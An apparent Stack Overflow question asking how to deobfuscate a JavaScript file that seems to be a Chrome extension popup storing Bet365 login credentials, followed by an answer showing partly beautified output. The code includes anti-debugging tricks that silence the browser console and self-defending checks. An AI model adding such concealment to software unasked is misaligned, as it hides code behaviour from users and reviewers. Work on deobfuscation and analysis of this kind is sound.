# How to decode this encoded Javascript?

Tags: javascript, encryption, obfuscation, decoding, deobfuscation

I got this script that seems to be obfuscated, and the original programmer is not reachable. I've tried many methods to decode it, but the best I get are variables and functions that don't make much sense.

Could someone provide me some help?

```js
var _0x1b5a=['\x74\x61\x62\x6c\x65','\x72\x65\x74\x75\x72\x6e\x20\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x20','\x70\x6a\x75\x66\x4a','\x74\x72\x61\x63\x65','\x69\x6e\x66\x6f','\x53\x48\x45\x61\x61','\x61\x70\x65\x6c\x69\x64\x6f','\x6c\x6f\x67\x67\x65\x64','\x71\x74\x64\x55\x73\x75\x61\x72\x69\x6f\x73\x4f\x6e\x6c\x69\x6e\x65','\x4c\x70\x6a\x55\x72','\x63\x6f\x6e\x6e\x65\x63\x74\x65\x64','\x74\x65\x6c\x61','\x41\x53\x75\x51\x51','\x4f\x4d\x78\x61\x55','\x5e\x28\x5b\x5e\x20\x5d\x2b\x28\x20\x2b\x5b\x5e\x20\x5d\x2b\x29\x2b\x29\x2b\x5b\x5e\x20\x5d\x7d','\x33\x7c\x30\x7c\x37\x7c\x32\x7c\x35\x7c\x31\x7c\x34\x7c\x36','\x65\x72\x72\x6f','\x73\x61\x6c\x76\x61\x72','\x76\x65\x72\x73\x61\x6f\x43\x6c\x61\x73\x73','\x48\x71\x4d\x72\x4a','\x65\x7a\x61\x45\x4e','\x63\x6f\x6e\x73\x6f\x6c\x65','\x70\x72\x65\x76\x65\x6e\x74\x44\x65\x66\x61\x75\x6c\x74','\x73\x65\x6e\x68\x61\x42\x65\x74\x33\x36\x35','\x31\x7c\x33\x7c\x32\x7c\x34\x7c\x30','\x77\x61\x72\x6e','\x76\x65\x72\x73\x69\x6f\x6e','\x76\x65\x72\x73\x61\x6f','\x73\x74\x61\x74\x75\x73','\x74\x63\x55\x56\x72','\x61\x70\x70\x6c\x79','\x73\x65\x6e\x64\x4d\x65\x73\x73\x61\x67\x65','\x64\x6f\x4c\x6f\x67\x6f\x75\x74','\x67\x65\x74','\x69\x73\x45\x6e\x76\x69\x61\x6e\x64\x6f\x46\x6f\x72\x6d','\x66\x71\x53\x4d\x61','\x63\x6f\x6e\x66\x69\x67\x43\x61\x73\x61\x41\x70\x6f\x73\x74\x61','\x6c\x6c\x72\x71\x71','\x79\x62\x63\x69\x4b','\x73\x76\x77\x4a\x72','\x72\x75\x6e\x74\x69\x6d\x65','\x77\x79\x79\x52\x64','\x5a\x4a\x4e\x56\x7a','\x73\x70\x6c\x69\x74','\x73\x74\x6f\x72\x61\x67\x65','\x76\x61\x6c\x6f\x72\x55\x6e\x69\x64\x61\x64\x65\x42\x65\x74\x33\x36\x35','\x65\x72\x72\x6f\x72','\x65\x6d\x61\x69\x6c','\x6f\x6e\x4d\x65\x73\x73\x61\x67\x65','\x23\x6d\x61\x69\x6e','\x63\x54\x54\x77\x45','\x73\x65\x6e\x68\x61','\x64\x65\x62\x75\x67','\x72\x65\x74\x75\x72\x6e\x20\x2f\x22\x20\x2b\x20\x74\x68\x69\x73\x20\x2b\x20\x22\x2f','\x61\x64\x64\x4c\x69\x73\x74\x65\x6e\x65\x72','\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72','\x6c\x6f\x67','\x74\x69\x70\x6f\x55\x73\x65\x72','\x65\x78\x63\x65\x70\x74\x69\x6f\x6e','\x6f\x6e\x6c\x6f\x61\x64','\x4c\x49\x55\x59\x76','\x53\x66\x70\x69\x77','\x45\x59\x7a\x48\x6f','\x7b\x7d\x2e\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x74\x68\x69\x73\x22\x29\x28\x20\x29','\x6d\x73\x67','\x65\x6e\x76\x69\x61\x6e\x64\x6f\x46\x6f\x72\x6d','\x49\x46\x4a\x50\x6b','\x64\x61\x74\x61','\x74\x41\x55\x55\x4f','\x63\x6f\x6e\x66\x69\x67','\x67\x65\x74\x4d\x61\x6e\x69\x66\x65\x73\x74','\x6b\x65\x79\x43\x6f\x64\x65','\x75\x73\x75\x61\x72\x69\x6f\x42\x65\x74\x33\x36\x35'];(function(_0x16ab9f,_0x1b5a7a){var _0x2ba715=function(_0x5cec0c){while(--_0x5cec0c){_0x16ab9f['push'](_0x16ab9f['shift']());}};var _0x1af375=function(){var _0xdd7ef1={'data':{'key':'cookie','value':'timeout'},'setCookie':function(_0x243201,_0x564c0f,_0x1228c2,_0xf84db7){_0xf84db7=_0xf84db7||{};var _0x216cfb=_0x564c0f+'='+_0x1228c2;var _0x140083=0x0;for(var _0xc0ade0=0x0,_0x206be6=_0x243201['length'];_0xc0ade0<_0x206be6;_0xc0ade0++){var _0x3fe404=_0x243201[_0xc0ade0];_0x216cfb+=';\x20'+_0x3fe404;var _0x51f2c6=_0x243201[_0x3fe404];_0x243201['push'](_0x51f2c6);_0x206be6=_0x243201['length'];if(_0x51f2c6!==!![]){_0x216cfb+='='+_0x51f2c6;}}_0xf84db7['cookie']=_0x216cfb;},'removeCookie':function(){return'dev';},'getCookie':function(_0x58d2f1,_0x19b3fc){_0x58d2f1=_0x58d2f1||function(_0x158582){return _0x158582;};var _0x1ae707=_0x58d2f1(new RegExp('(?:^|;\x20)'+_0x19b3fc['replace'](/([.$?*|{}()[]\/+^])/g,'$1')+'=([^;]*)'));var _0x4e5b62=function(_0x12d18a,_0x28a461){_0x12d18a(++_0x28a461);};_0x4e5b62(_0x2ba715,_0x1b5a7a);return _0x1ae707?decodeURIComponent(_0x1ae707[0x1]):undefined;}};var _0x44a2e0=function(){var _0x32210f=new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');return _0x32210f['test'](_0xdd7ef1['removeCookie']['toString']());};_0xdd7ef1['updateCookie']=_0x44a2e0;var _0x32ceda='';var _0x5638a9=_0xdd7ef1['updateCookie']();if(!_0x5638a9){_0xdd7ef1['setCookie'](['*'],'counter',0x1);}else if(_0x5638a9){_0x32ceda=_0xdd7ef1['getCookie'](null,'counter');}else{_0xdd7ef1['removeCookie']();}};_0x1af375();}(_0x1b5a,0xc3));var _0x2ba7=function(_0x16ab9f,_0x1b5a7a){_0x16ab9f=_0x16ab9f-0x0;var _0x2ba715=_0x1b5a[_0x16ab9f];return _0x2ba715;};var _0x243201=function(){var _0x11fd75=!![];return function(_0xa74c1d,_0xe3c57c){var _0x261b9c=_0x11fd75?function(){if(_0xe3c57c){var _0x469a37=_0xe3c57c[_0x2ba7('\x30\x78\x33\x36')](_0xa74c1d,arguments);_0xe3c57c=null;return _0x469a37;}}:function(){};_0x11fd75=![];return _0x261b9c;};}();var _0x5638a9=_0x243201(this,function(){var _0x3f1742={};_0x3f1742[_0x2ba7('\x30\x78\x32\x31')]=_0x2ba7('\x30\x78\x32\x36');_0x3f1742[_0x2ba7('\x30\x78\x33\x35')]=function(_0x48b5c5){return _0x48b5c5();};var _0x4a31ce=_0x3f1742;var _0x2c0b21=function(){var _0x154f12=_0x2c0b21[_0x2ba7('\x30\x78\x36')](_0x2ba7('\x30\x78\x34'))()['\x63\x6f\x6d\x70\x69\x6c\x65'](_0x4a31ce['\x4c\x70\x6a\x55\x72']);return!_0x154f12['\x74\x65\x73\x74'](_0x5638a9);};return _0x4a31ce[_0x2ba7('\x30\x78\x33\x35')](_0x2c0b21);});_0x5638a9();var _0xdd7ef1=function(){var _0x5b5961=!![];return function(_0xc7fbe8,_0x2ab9fd){var _0x224de1=_0x5b5961?function(){if(_0x2ab9fd){var _0x52ffb5=_0x2ab9fd[_0x2ba7('\x30\x78\x33\x36')](_0xc7fbe8,arguments);_0x2ab9fd=null;return _0x52ffb5;}}:function(){};_0x5b5961=![];return _0x224de1;};}();var _0x5cec0c=_0xdd7ef1(this,function(){var _0x57fc36={};_0x57fc36[_0x2ba7('\x30\x78\x34\x32')]=_0x2ba7('\x30\x78\x32\x37');_0x57fc36[_0x2ba7('\x30\x78\x63')]=function(_0x14e3ce,_0x46080d){return _0x14e3ce(_0x46080d);};_0x57fc36[_0x2ba7('\x30\x78\x33\x66')]=function(_0x2afa66,_0x5be2bf){return _0x2afa66+_0x5be2bf;};_0x57fc36[_0x2ba7('\x30\x78\x33\x64')]=function(_0x50bad1){return _0x50bad1();};var _0xd46126=_0x57fc36;var _0x478f98=_0x2ba7('\x30\x78\x33\x30')['\x73\x70\x6c\x69\x74']('\x7c');var _0x5437c0=0x0;while(!![]){switch(_0x478f98[_0x5437c0++]){case'\x30':if(!_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')]){_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')]=function(_0x429b35){var _0x231c56={};_0x231c56['\x6c\x6f\x67']=_0x429b35;_0x231c56['\x77\x61\x72\x6e']=_0x429b35;_0x231c56[_0x2ba7('\x30\x78\x33')]=_0x429b35;_0x231c56[_0x2ba7('\x30\x78\x31\x63')]=_0x429b35;_0x231c56[_0x2ba7('\x30\x78\x34\x36')]=_0x429b35;_0x231c56[_0x2ba7('\x30\x78\x39')]=_0x429b35;_0x231c56[_0x2ba7('\x30\x78\x31\x38')]=_0x429b35;_0x231c56[_0x2ba7('\x30\x78\x31\x62')]=_0x429b35;return _0x231c56;}(_0x3d5d81);}else{var _0x478062=_0xd46126[_0x2ba7('\x30\x78\x34\x32')]['\x73\x70\x6c\x69\x74']('\x7c');var _0x203db5=0x0;while(!![]){switch(_0x478062[_0x203db5++]){case'\x30':_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')][_0x2ba7('\x30\x78\x33\x31')]=_0x3d5d81;continue;case'\x31':_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')][_0x2ba7('\x30\x78\x39')]=_0x3d5d81;continue;case'\x32':_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')][_0x2ba7('\x30\x78\x31\x63')]=_0x3d5d81;continue;case'\x33':_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')][_0x2ba7('\x30\x78\x37')]=_0x3d5d81;continue;case'\x34':_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')]['\x74\x61\x62\x6c\x65']=_0x3d5d81;continue;case'\x35':_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')][_0x2ba7('\x30\x78\x34\x36')]=_0x3d5d81;continue;case'\x36':_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')]['\x74\x72\x61\x63\x65']=_0x3d5d81;continue;case'\x37':_0x5dce2d[_0x2ba7('\x30\x78\x32\x64')][_0x2ba7('\x30\x78\x33')]=_0x3d5d81;continue;}break;}}continue;case'\x31':var _0x45d015={};_0x45d015['\x53\x48\x45\x61\x61']=function(_0x1573c4,_0x47601e){return _0xd46126['\x53\x66\x70\x69\x77'](_0x1573c4,_0x47601e);};_0x45d015['\x74\x41\x55\x55\x4f']=function(_0x16739e,_0xdaebce){return _0xd46126[_0x2ba7('\x30\x78\x33\x66')](_0x16739e,_0xdaebce);};_0x45d015['\x70\x6a\x75\x66\x4a']=_0x2ba7('\x30\x78\x31\x39');_0x45d015[_0x2ba7('\x30\x78\x32\x62')]=_0x2ba7('\x30\x78\x65');var _0x1dbc61=_0x45d015;continue;case'\x32':var _0x56a491=function(){var _0x31dab6;try{_0x31dab6=_0x1dbc61[_0x2ba7('\x30\x78\x31\x64')](Function,_0x1dbc61[_0x2ba7('\x30\x78\x31\x33')](_0x1dbc61[_0x2ba7('\x30\x78\x31\x33')](_0x1dbc61[_0x2ba7('\x30\x78\x31\x61')],_0x1dbc61[_0x2ba7('\x30\x78\x32\x62')]),'\x29\x3b'))();}catch(_0x4901f7){_0x31dab6=window;}return _0x31dab6;};continue;case'\x33':var _0x3d5d81=function(){};continue;case'\x34':var _0x5dce2d=_0xd46126[_0x2ba7('\x30\x78\x33\x64')](_0x56a491);continue;}break;}});_0x5cec0c();function main(){var _0x2efbad={};_0x2efbad[_0x2ba7('\x30\x78\x64')]=_0x2ba7('\x30\x78\x33\x38');_0x2efbad[_0x2ba7('\x30\x78\x33\x62')]='\x64\x6f\x4c\x6f\x67\x69\x6e';_0x2efbad[_0x2ba7('\x30\x78\x62')]=_0x2ba7('\x30\x78\x32\x39');_0x2efbad[_0x2ba7('\x30\x78\x32\x63')]=function(_0x3f39bb,_0x27794a){return _0x3f39bb==_0x27794a;};_0x2efbad[_0x2ba7('\x30\x78\x31')]=_0x2ba7('\x30\x78\x31\x34');_0x2efbad[_0x2ba7('\x30\x78\x34\x31')]=_0x2ba7('\x30\x78\x32\x38');_0x2efbad['\x49\x46\x4a\x50\x6b']='\x67\x65\x74\x53\x74\x61\x74\x75\x73';_0x2efbad[_0x2ba7('\x30\x78\x32\x35')]=_0x2ba7('\x30\x78\x30');var _0x13ebaf=_0x2efbad;var _0x5b2666={};_0x5b2666[_0x2ba7('\x30\x78\x31\x66')]=![];_0x5b2666['\x69\x64']='';_0x5b2666[_0x2ba7('\x30\x78\x31\x65')]='';_0x5b2666['\x65\x6d\x61\x69\x6c']='';_0x5b2666[_0x2ba7('\x30\x78\x31\x37')]='';_0x5b2666[_0x2ba7('\x30\x78\x32')]='';_0x5b2666[_0x2ba7('\x30\x78\x32\x66')]='';_0x5b2666[_0x2ba7('\x30\x78\x32\x32')]=![];_0x5b2666[_0x2ba7('\x30\x78\x32\x38')]='';_0x5b2666['\x76\x61\x6c\x6f\x72\x55\x6e\x69\x64\x61\x64\x65\x42\x65\x74\x33\x36\x35']=0.5;_0x5b2666[_0x2ba7('\x30\x78\x38')]=0x1;_0x5b2666[_0x2ba7('\x30\x78\x33\x33')]=chrome[_0x2ba7('\x30\x78\x34\x30')][_0x2ba7('\x30\x78\x31\x35')]()[_0x2ba7('\x30\x78\x33\x32')];_0x5b2666[_0x2ba7('\x30\x78\x32\x61')]='';_0x5b2666['\x74\x65\x6c\x61']='';_0x5b2666['\x65\x6e\x76\x69\x61\x6e\x64\x6f\x46\x6f\x72\x6d']=![];_0x5b2666[_0x2ba7('\x30\x78\x32\x30')]=0x0;var _0x2f4180={};_0x2f4180[_0x2ba7('\x30\x78\x33\x61')]=function(){return this[_0x2ba7('\x30\x78\x31\x30')];};app=new Vue({'\x65\x6c':_0x13ebaf[_0x2ba7('\x30\x78\x32\x35')],'\x64\x61\x74\x61':_0x5b2666,'\x6d\x65\x74\x68\x6f\x64\x73':{'\x6c\x6f\x67\x6f\x75\x74':function(){var _0x18b8e6={};_0x18b8e6[_0x2ba7('\x30\x78\x66')]=_0x13ebaf[_0x2ba7('\x30\x78\x64')];chrome[_0x2ba7('\x30\x78\x34\x30')][_0x2ba7('\x30\x78\x33\x37')](_0x18b8e6);},'\x6c\x6f\x67\x69\x6e':function(_0xcd676a){var _0x27c34c='\x34\x7c\x31\x7c\x32\x7c\x30\x7c\x33'[_0x2ba7('\x30\x78\x34\x33')]('\x7c');var _0x1420a9=0x0;while(!![]){switch(_0x27c34c[_0x1420a9++]){case'\x30':var _0xdeec2a={};_0xdeec2a[_0x2ba7('\x30\x78\x66')]=_0x13ebaf[_0x2ba7('\x30\x78\x33\x62')];_0xdeec2a[_0x2ba7('\x30\x78\x34\x37')]=this[_0x2ba7('\x30\x78\x34\x37')];_0xdeec2a[_0x2ba7('\x30\x78\x32')]=this['\x73\x65\x6e\x68\x61'];chrome[_0x2ba7('\x30\x78\x34\x30')][_0x2ba7('\x30\x78\x33\x37')](_0xdeec2a);continue;case'\x31':app['\x65\x72\x72\x6f']='';continue;case'\x32':_0xcd676a[_0x2ba7('\x30\x78\x32\x65')]();continue;case'\x33':return![];case'\x34':app[_0x2ba7('\x30\x78\x31\x30')]=!![];continue;}break;}},'\x62\x74\x53\x61\x6c\x76\x61\x72':function(){var _0x27e90f={};_0x27e90f[_0x2ba7('\x30\x78\x34\x35')]=this[_0x2ba7('\x30\x78\x34\x35')];_0x27e90f['\x75\x73\x75\x61\x72\x69\x6f\x42\x65\x74\x33\x36\x35']=this[_0x2ba7('\x30\x78\x31\x37')];_0x27e90f[_0x2ba7('\x30\x78\x32\x66')]=this[_0x2ba7('\x30\x78\x32\x66')];var _0xc15cf1={};_0xc15cf1[_0x2ba7('\x30\x78\x66')]=_0x13ebaf[_0x2ba7('\x30\x78\x62')];_0xc15cf1[_0x2ba7('\x30\x78\x31\x32')]=_0x27e90f;chrome[_0x2ba7('\x30\x78\x34\x30')]['\x73\x65\x6e\x64\x4d\x65\x73\x73\x61\x67\x65'](_0xc15cf1);app['\x74\x65\x6c\x61']='';},'\x6f\x6e\x6c\x79\x4e\x75\x6d\x62\x65\x72':function(_0x629849){if(_0x13ebaf[_0x2ba7('\x30\x78\x32\x63')](_0x629849[_0x2ba7('\x30\x78\x31\x36')],0x2e)){_0x629849[_0x2ba7('\x30\x78\x32\x65')]();}},'\x62\x74\x43\x6f\x6e\x66\x69\x67':function(){app[_0x2ba7('\x30\x78\x32\x33')]=_0x13ebaf[_0x2ba7('\x30\x78\x31')];},'\x62\x74\x56\x6f\x6c\x74\x61\x72':function(){app[_0x2ba7('\x30\x78\x32\x33')]='';}},'\x63\x6f\x6d\x70\x75\x74\x65\x64':_0x2f4180,'\x63\x72\x65\x61\x74\x65\x64':function(){var _0x457076={};_0x457076[_0x2ba7('\x30\x78\x33\x65')]=_0x2ba7('\x30\x78\x33\x63');_0x457076['\x41\x53\x75\x51\x51']=_0x13ebaf[_0x2ba7('\x30\x78\x34\x31')];var _0x927392=_0x457076;chrome[_0x2ba7('\x30\x78\x34\x30')][_0x2ba7('\x30\x78\x34\x38')][_0x2ba7('\x30\x78\x35')](function(_0x471314,_0x3da1bf,_0x55f11d){switch(_0x471314[_0x2ba7('\x30\x78\x66')]){case _0x2ba7('\x30\x78\x33\x34'):app[_0x2ba7('\x30\x78\x31\x30')]=![];app[_0x2ba7('\x30\x78\x31\x66')]=_0x471314['\x6c\x6f\x67\x67\x65\x64']?_0x471314[_0x2ba7('\x30\x78\x31\x66')]:![];app['\x61\x70\x65\x6c\x69\x64\x6f']=_0x471314[_0x2ba7('\x30\x78\x31\x65')]?_0x471314['\x61\x70\x65\x6c\x69\x64\x6f']:'';app[_0x2ba7('\x30\x78\x32\x32')]=_0x471314[_0x2ba7('\x30\x78\x32\x32')];app[_0x2ba7('\x30\x78\x38')]=_0x471314['\x74\x69\x70\x6f\x55\x73\x65\x72'];app[_0x2ba7('\x30\x78\x32\x33')]=_0x471314[_0x2ba7('\x30\x78\x32\x33')]?_0x471314['\x74\x65\x6c\x61']:'';app[_0x2ba7('\x30\x78\x32\x30')]=_0x471314[_0x2ba7('\x30\x78\x32\x30')];app[_0x2ba7('\x30\x78\x32\x61')]=_0x471314[_0x2ba7('\x30\x78\x32\x61')];chrome[_0x2ba7('\x30\x78\x34\x34')]['\x6c\x6f\x63\x61\x6c'][_0x2ba7('\x30\x78\x33\x39')]([_0x927392[_0x2ba7('\x30\x78\x33\x65')]],_0x40dfc8=>{if(_0x40dfc8[_0x2ba7('\x30\x78\x33\x63')]){app[_0x2ba7('\x30\x78\x31\x37')]=_0x40dfc8[_0x2ba7('\x30\x78\x33\x63')][_0x2ba7('\x30\x78\x31\x37')];app['\x73\x65\x6e\x68\x61\x42\x65\x74\x33\x36\x35']=_0x40dfc8['\x63\x6f\x6e\x66\x69\x67\x43\x61\x73\x61\x41\x70\x6f\x73\x74\x61'][_0x2ba7('\x30\x78\x32\x66')];app[_0x2ba7('\x30\x78\x34\x35')]=_0x40dfc8[_0x2ba7('\x30\x78\x33\x63')][_0x2ba7('\x30\x78\x34\x35')];}});app['\x65\x72\x72\x6f']='';break;case _0x927392[_0x2ba7('\x30\x78\x32\x34')]:app[_0x2ba7('\x30\x78\x31\x30')]=![];app[_0x2ba7('\x30\x78\x32\x38')]=_0x471314[_0x2ba7('\x30\x78\x34\x36')];_0x471314['\x74\x65\x6c\x61']='';break;}_0x55f11d();});var _0x4e2e02={};_0x4e2e02[_0x2ba7('\x30\x78\x66')]=_0x13ebaf[_0x2ba7('\x30\x78\x31\x31')];chrome['\x72\x75\x6e\x74\x69\x6d\x65'][_0x2ba7('\x30\x78\x33\x37')](_0x4e2e02);}});}var app;window[_0x2ba7('\x30\x78\x61')]=main;
```

I've seen a very similar question here: [Encoded JavaScript: How to decode?](https://stackoverflow.com/questions/47652574/encoded-javascript-how-to-decode)

But couldn't quite follow the instructions.

Comment: I think its dependes what kind of encryption is this.

Comment: Those can be quickly read in clear in the console. Just take one of those encoded strings and enter in your browser console.

Answer (score 5):

The decoder just keeps breaking down and it keeps giving me an Unable error.

https://beautifier.io/ is all you need. Just make sure to toggle this setting

> Unescape printable chars encoded as \xNN or \uNNNN?

So your original 15k lines of code becomes

```
(function(_0x16ab9f, _0x1b5a7a) {
    var _0x2ba715 = function(_0x5cec0c) {
        while (--_0x5cec0c) {
            _0x16ab9f['push'](_0x16ab9f['shift']());
        }
    };
    var _0x1af375 = function() {
        var _0xdd7ef1 = {
            'data': {
                'key': 'cookie',
                'value': 'timeout'
            },
            'setCookie': function(_0x243201, _0x564c0f, _0x1228c2, _0xf84db7) {
                _0xf84db7 = _0xf84db7 || {};
                var _0x216cfb = _0x564c0f + '=' + _0x1228c2;
                var _0x140083 = 0x0;
                for (var _0xc0ade0 = 0x0, _0x206be6 = _0x243201['length']; _0xc0ade0 < _0x206be6; _0xc0ade0++) {
                    var _0x3fe404 = _0x243201[_0xc0ade0];
                    _0x216cfb += '; ' + _0x3fe404;
                    var _0x51f2c6 = _0x243201[_0x3fe404];
                    _0x243201['push'](_0x51f2c6);
                    _0x206be6 = _0x243201['length'];
                    if (_0x51f2c6 !== !![]) {
                        _0x216cfb += '=' + _0x51f2c6;
                    }
                }
                _0xf84db7['cookie'] = _0x216cfb;
            },
            'removeCookie': function() {
                return 'dev';
            },
            'getCookie': function(_0x58d2f1, _0x19b3fc) {
                _0x58d2f1 = _0x58d2f1 || function(_0x158582) {
                    return _0x158582;
                };
                var _0x1ae707 = _0x58d2f1(new RegExp('(?:^|; )' + _0x19b3fc['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
                var _0x4e5b62 = function(_0x12d18a, _0x28a461) {
                    _0x12d18a(++_0x28a461);
                };
                _0x4e5b62(_0x2ba715, _0x1b5a7a);
                return _0x1ae707 ? decodeURIComponent(_0x1ae707[0x1]) : undefined;
            }
        };
        var _0x44a2e0 = function() {
            var _0x32210f = new RegExp('\\w+ *\\(\\) *{\\w+ *[\'|\"].+[\'|\"];? *}');
            return _0x32210f['test'](_0xdd7ef1['removeCookie']['toString']());
        };
        _0xdd7ef1['updateCookie'] = _0x44a2e0;
        var _0x32ceda = '';
        var _0x5638a9 = _0xdd7ef1['updateCookie']();
        if (!_0x5638a9) {
            _0xdd7ef1['setCookie'](['*'], 'counter', 0x1);
        } else if (_0x5638a9) {
            _0x32ceda = _0xdd7ef1['getCookie'](null, 'counter');
        } else {
            _0xdd7ef1['removeCookie']();
        }
    };
    _0x1af375();
}(_0x1b5a, 0xc3));
var _0x2ba7 = function(_0x16ab9f, _0x1b5a7a) {
    _0x16ab9f = _0x16ab9f - 0x0;
    var _0x2ba715 = _0x1b5a[_0x16ab9f];
    return _0x2ba715;
};
var _0x243201 = function() {
    var _0x11fd75 = !![];
    return function(_0xa74c1d, _0xe3c57c) {
        var _0x261b9c = _0x11fd75 ? function() {
            if (_0xe3c57c) {
                var _0x469a37 = _0xe3c57c[_0x2ba7('0x36')](_0xa74c1d, arguments);
                _0xe3c57c = null;
                return _0x469a37;
            }
        } : function() {};
        _0x11fd75 = ![];
        return _0x261b9c;
    };
}();
var _0x5638a9 = _0x243201(this, function() {
    var _0x3f1742 = {};
    _0x3f1742[_0x2ba7('0x21')] = _0x2ba7('0x26');
    _0x3f1742[_0x2ba7('0x35')] = function(_0x48b5c5) {
        return _0x48b5c5();
    };
    var _0x4a31ce = _0x3f1742;
    var _0x2c0b21 = function() {
        var _0x154f12 = _0x2c0b21[_0x2ba7('0x6')](_0x2ba7('0x4'))()['compile'](_0x4a31ce['LpjUr']);
        return !_0x154f12['test'](_0x5638a9);
    };
    return _0x4a31ce[_0x2ba7('0x35')](_0x2c0b21);
});
_0x5638a9();
var _0xdd7ef1 = function() {
    var _0x5b5961 = !![];
    return function(_0xc7fbe8, _0x2ab9fd) {
        var _0x224de1 = _0x5b5961 ? function() {
            if (_0x2ab9fd) {
                var _0x52ffb5 = _0x2ab9fd[_0x2ba7('0x36')](_0xc7fbe8, arguments);
                _0x2ab9fd = null;
                return _0x52ffb5;
            }
        } : function() {};
        _0x5b5961 = ![];
        return _0x224de1;
    };
}();
var _0x5cec0c = _0xdd7ef1(this, function() {
    var _0x57fc36 = {};
    _0x57fc36[_0x2ba7('0x42')] = _0x2ba7('0x27');
    _0x57fc36[_0x2ba7('0xc')] = function(_0x14e3ce, _0x46080d) {
        return _0x14e3ce(_0x46080d);
    };
    _0x57fc36[_0x2ba7('0x3f')] = function(_0x2afa66, _0x5be2bf) {
        return _0x2afa66 + _0x5be2bf;
    };
    _0x57fc36[_0x2ba7('0x3d')] = function(_0x50bad1) {
        return _0x50bad1();
    };
    var _0xd46126 = _0x57fc36;
    var _0x478f98 = _0x2ba7('0x30')['split']('|');
    var _0x5437c0 = 0x0;
    while (!![]) {
        switch (_0x478f98[_0x5437c0++]) {
            case '0':
                if (!_0x5dce2d[_0x2ba7('0x2d')]) {
                    _0x5dce2d[_0x2ba7('0x2d')] = function(_0x429b35) {
                        var _0x231c56 = {};
                        _0x231c56['log'] = _0x429b35;
                        _0x231c56['warn'] = _0x429b35;
                        _0x231c56[_0x2ba7('0x3')] = _0x429b35;
                        _0x231c56[_0x2ba7('0x1c')] = _0x429b35;
                        _0x231c56[_0x2ba7('0x46')] = _0x429b35;
                        _0x231c56[_0x2ba7('0x9')] = _0x429b35;
                        _0x231c56[_0x2ba7('0x18')] = _0x429b35;
                        _0x231c56[_0x2ba7('0x1b')] = _0x429b35;
                        return _0x231c56;
                    }(_0x3d5d81);
                } else {
                    var _0x478062 = _0xd46126[_0x2ba7('0x42')]['split']('|');
                    var _0x203db5 = 0x0;
                    while (!![]) {
                        switch (_0x478062[_0x203db5++]) {
                            case '0':
                                _0x5dce2d[_0x2ba7('0x2d')][_0x2ba7('0x31')] = _0x3d5d81;
                                continue;
                            case '1':
                                _0x5dce2d[_0x2ba7('0x2d')][_0x2ba7('0x9')] = _0x3d5d81;
                                continue;
                            case '2':
                                _0x5dce2d[_0x2ba7('0x2d')][_0x2ba7('0x1c')] = _0x3d5d81;
                                continue;
                            case '3':
                                _0x5dce2d[_0x2ba7('0x2d')][_0x2ba7('0x7')] = _0x3d5d81;
                                continue;
                            case '4':
                                _0x5dce2d[_0x2ba7('0x2d')]['table'] = _0x3d5d81;
                                continue;
                            case '5':
                                _0x5dce2d[_0x2ba7('0x2d')][_0x2ba7('0x46')] = _0x3d5d81;
                                continue;
                            case '6':
                                _0x5dce2d[_0x2ba7('0x2d')]['trace'] = _0x3d5d81;
                                continue;
                            case '7':
                                _0x5dce2d[_0x2ba7('0x2d')][_0x2ba7('0x3')] = _0x3d5d81;
                                continue;
                        }
                        break;
                    }
                }
                continue;
            case '1':
                var _0x45d015 = {};
                _0x45d015['SHEaa'] = function(_0x1573c4, _0x47601e) {
                    return _0xd46126['Sfpiw'](_0x1573c4, _0x47601e);
                };
                _0x45d015['tAUUO'] = function(_0x16739e, _0xdaebce) {
                    return _0xd46126[_0x2ba7('0x3f')](_0x16739e, _0xdaebce);
                };
                _0x45d015['pjufJ'] = _0x2ba7('0x19');
                _0x45d015[_0x2ba7('0x2b')] = _0x2ba7('0xe');
                var _0x1dbc61 = _0x45d015;
                continue;
            case '2':
                var _0x56a491 = function() {
                    var _0x31dab6;
                    try {
                        _0x31dab6 = _0x1dbc61[_0x2ba7('0x1d')](Function, _0x1dbc61[_0x2ba7('0x13')](_0x1dbc61[_0x2ba7('0x13')](_0x1dbc61[_0x2ba7('0x1a')], _0x1dbc61[_0x2ba7('0x2b')]), ');'))();
                    } catch (_0x4901f7) {
                        _0x31dab6 = window;
                    }
                    return _0x31dab6;
                };
                continue;
            case '3':
                var _0x3d5d81 = function() {};
                continue;
            case '4':
                var _0x5dce2d = _0xd46126[_0x2ba7('0x3d')](_0x56a491);
                continue;
        }
        break;
    }
});
_0x5cec0c();

function main() {
    var _0x2efbad = {};
    _0x2efbad[_0x2ba7('0xd')] = _0x2ba7('0x38');
    _0x2efbad[_0x2ba7('0x3b')] = 'doLogin';
    _0x2efbad[_0x2ba7('0xb')] = _0x2ba7('0x29');
    _0x2efbad[_0x2ba7('0x2c')] = function(_0x3f39bb, _0x27794a) {
        return _0x3f39bb == _0x27794a;
    };
    _0x2efbad[_0x2ba7('0x1')] = _0x2ba7('0x14');
    _0x2efbad[_0x2ba7('0x41')] = _0x2ba7('0x28');
    _0x2efbad['IFJPk'] = 'getStatus';
    _0x2efbad[_0x2ba7('0x25')] = _0x2ba7('0x0');
    var _0x13ebaf = _0x2efbad;
    var _0x5b2666 = {};
    _0x5b2666[_0x2ba7('0x1f')] = ![];
    _0x5b2666['id'] = '';
    _0x5b2666[_0x2ba7('0x1e')] = '';
    _0x5b2666['email'] = '';
    _0x5b2666[_0x2ba7('0x17')] = '';
    _0x5b2666[_0x2ba7('0x2')] = '';
    _0x5b2666[_0x2ba7('0x2f')] = '';
    _0x5b2666[_0x2ba7('0x22')] = ![];
    _0x5b2666[_0x2ba7('0x28')] = '';
    _0x5b2666['valorUnidadeBet365'] = 0.5;
    _0x5b2666[_0x2ba7('0x8')] = 0x1;
    _0x5b2666[_0x2ba7('0x33')] = chrome[_0x2ba7('0x40')][_0x2ba7('0x15')]()[_0x2ba7('0x32')];
